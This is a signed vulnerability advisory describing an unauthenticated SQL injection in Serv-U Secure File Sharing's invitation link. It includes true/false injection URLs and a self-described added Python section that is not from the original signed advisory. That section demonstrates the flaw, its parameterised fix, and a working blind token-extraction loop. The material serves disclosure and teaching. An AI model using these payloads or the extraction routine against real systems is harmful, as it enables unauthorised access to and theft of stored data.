-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-042
Product: Secure File Sharing
Vendor: Serv-U
Affected Version(s): Serv-U 15.1.2.189 and below
Tested Version(s): Serv-U 15.1.2.189
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2015-07-23
Solution Date: 2015-11-04
Public Disclosure: 2015-11-09
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

An SQL injection vulnerability was identified in the Serv-U Secure File
Sharing application.

Serv-U Secure File Sharing is described as follows [1]:

"Secure file sharing lets users send files to and request files from
anyone. When deployed in your data center, Serv-U Managed File Transfer
Server provides this popular “ad hoc” file transfer service to your
end-users on your existing infrastructure, and under the control of your
existing security policy."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found an SQL injection vulnerability in the invitation link
used by the Secure File Sharing application. The ShareToken query
parameter of the link is passed into an SQL statement without proper
escaping or parameter binding.

The vulnerability can be exploited by unauthenticated users, since the
invitation link is by design reachable without a login.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Assuming a valid file sharing link:

https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

The following link, which appends an SQL condition that evaluates to
true, will show the same content:

https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'+AND+'1'='1

While a URL with an appended SQL condition that evaluates to false will
be recognized as an invalid share:

https://www.example.com/?ShareToken=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'+AND+'1'='2

The differing responses to the true and false conditions give an
attacker a boolean oracle, which is sufficient for blind extraction of
database contents.

Using stacked queries, this vulnerability can also be exploited without
a valid share token.
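The following Python model is an added example and is not code from the advisory or from Serv-U. It reproduces the PoC behaviour on an in-memory SQLite database: a hypothetical `shares` table (table and column names are assumptions, not Serv-U's schema) is queried once by string concatenation, which is the defect class the advisory describes, and once with a bound parameter, which is the fix. The three advisory URLs are run through both, and the boolean oracle is then generalised into a character-by-character blind extraction of a stored token without holding a valid one. Note that this extraction uses an OR clause rather than the stacked queries the advisory mentions; it is the general technique of which the PoC's true/false links are one instance. The sample token and file name are constructed.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample data: a 40-hex-digit token of the same shape as the one
# in the advisory. The "shares" table and its columns are assumptions made
# for this model, not Serv-U's real schema.
VALID_TOKEN = "F" * 40
BASE = "https://www.example.com/?ShareToken="
URL_VALID = BASE + VALID_TOKEN
URL_TRUE = BASE + VALID_TOKEN + "'+AND+'1'='1"
URL_FALSE = BASE + VALID_TOKEN + "'+AND+'1'='2"


def build_db():
    """In-memory SQLite stand-in for the application's share-token store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE shares (id INTEGER PRIMARY KEY, "
        "ShareToken TEXT NOT NULL, FileName TEXT NOT NULL)"
    )
    conn.execute(
        "INSERT INTO shares (ShareToken, FileName) VALUES (?, ?)",
        (VALID_TOKEN, "report.pdf"),
    )
    conn.commit()
    return conn


def token_from_url(url):
    """Extract the ShareToken query parameter. parse_qs decodes '+' to a
    space, which is how the advisory's '+AND+' reaches SQL as ' AND '."""
    return parse_qs(urlsplit(url).query).get("ShareToken", [""])[0]


def lookup_vulnerable(conn, token):
    """Model of the flaw (an assumption, not Serv-U's code): the token is
    concatenated into the statement, so a quote in it closes the literal."""
    sql = "SELECT FileName FROM shares WHERE ShareToken = '" + token + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(conn, token):
    """Hardened form: a bound parameter is always data, never SQL syntax."""
    row = conn.execute(
        "SELECT FileName FROM shares WHERE ShareToken = ?", (token,)
    ).fetchone()
    return row[0] if row else None


def share_is_valid(conn, url, lookup):
    """The boolean oracle an attacker observes: is the share shown or not?"""
    return lookup(conn, token_from_url(url)) is not None


def extract_token(conn, length=40, alphabet="0123456789ABCDEF"):
    """Boolean-based blind extraction of the first stored token, one
    character per query, using only the valid/invalid oracle and no valid
    token at all. Uses an OR clause, not stacked queries."""
    recovered = ""
    for pos in range(1, length + 1):  # SQLite substr() is 1-based
        for ch in alphabet:
            probe = (
                "x' OR substr((SELECT ShareToken FROM shares LIMIT 1),"
                f"{pos},1)='{ch}"
            )
            if lookup_vulnerable(conn, probe) is not None:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered


if __name__ == "__main__":
    conn = build_db()
    for name, url in (("valid", URL_VALID), ("true", URL_TRUE), ("false", URL_FALSE)):
        print(
            f"{name:5s} vulnerable={share_is_valid(conn, url, lookup_vulnerable)} "
            f"fixed={share_is_valid(conn, url, lookup_fixed)}"
        )
    print("recovered token:", extract_token(conn))
```

Against the concatenating lookup the "true" URL is accepted exactly like the genuine link and the "false" URL is rejected, which is the oracle the advisory describes; the parameterised lookup rejects both tampered URLs because the appended condition is compared as part of the token string. The extraction loop needs at most 16 requests per token character, so a 40-character token falls in a few hundred requests, which is why a blind injection on an unauthenticated endpoint is rated high even when no error message or data is echoed back.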
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information from Serv-U, a HotFix for the described
security issue is available at [2].

Please contact the manufacturer for further information or support.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-07-06: Vulnerability discovered
2015-07-23: Vulnerability reported to vendor
2015-07-30: Vulnerability reported again, as the vendor did not respond
            to the first e-mail
2015-08-31: Vulnerability reported again, as the vendor did not respond
            to the previous e-mails
2015-09-16: Rescheduling of the publication date in agreement with the
            manufacturer
2015-11-09: Public release of security advisory on the agreed
            publication date

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Serv-U, Secure File Sharing
    http://www.serv-u.com/secure-file-sharing
[2] Serv-U, HotFix for Secure File Sharing
    http://downloads.solarwinds.com/solarwinds/Release/HotFix/SU-v15.1.2-HotFix2.zip
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Franz G. Jahn and Philipp Buchegger of
SySS GmbH.

E-Mail: franz.jahn (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

E-Mail: philipp.buchegger (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Philipp_Buchegger.asc
Key ID: 0xBB6747E8
Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind.
Details of this security advisory may be updated in order to provide
information that is as accurate as possible. The latest version of this
security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWPMsvAAoJENWmFJbQahTeVK8P/jpDnE2XS8g8qxE/A1xBI93U
0AvQjfglx5Y8bIARkDzMhmgrvWKcrhwMoJj8QJElAAU3OhPYlZHRHcu/I2SyWGks
Ad0V5ceK41VucvjF2+XRGqSmZmCwB6y1TY9TE+HrGg/5PBhrX6s1cjiaWDcvw2HV
D/iuKjlLP6c6+yE21z/TGKm9b6N2EmahKrCOwQPln4RRyRkh32uw8/U+Wja3ujiI
gWtCD0O8eIEsy5UPko8wqqsGB0D9WjUQea6jdTJk5eESu7h1dmKGkLdTivv0Z7s5
+bh/YIg9PNGIUFF+flhPBivQ7vLyyE5xqQ4S+I1LAy+hwKUtkP76f1lNQcgx449E
YCZnFBR5jhtEOtVVgF24KG6JksjQ5tNS+sCA7o6MYPAuxOXjLqVB2rgh6DE5cKr6
ydMRhjl94b6Pd352dWQlJt1t4/lfc0hTRd+BXe/DN/tTBnVbnk8qGvtS2ZGe4jcQ
omclqaR/VMK6nxsFr6SgvElDrmbYsX9n1q1g6mv9nH/yHC16tx4u9lprVtO8jp+8
NmR0A/UZBBm4o3zDDi6EYi7ByqlvryuOIZDpuqLC64uJbKR35VdCUdN1SDXxLU+B
2u1g9ADtTC6P7b50GDw4X8afTdzOkK7Y5crEceUTtzyp3LGUc5sER2R+G4fg7s4o
v+yZ8TtxGhwFIlTWg4mn
=hSde
-----END PGP SIGNATURE-----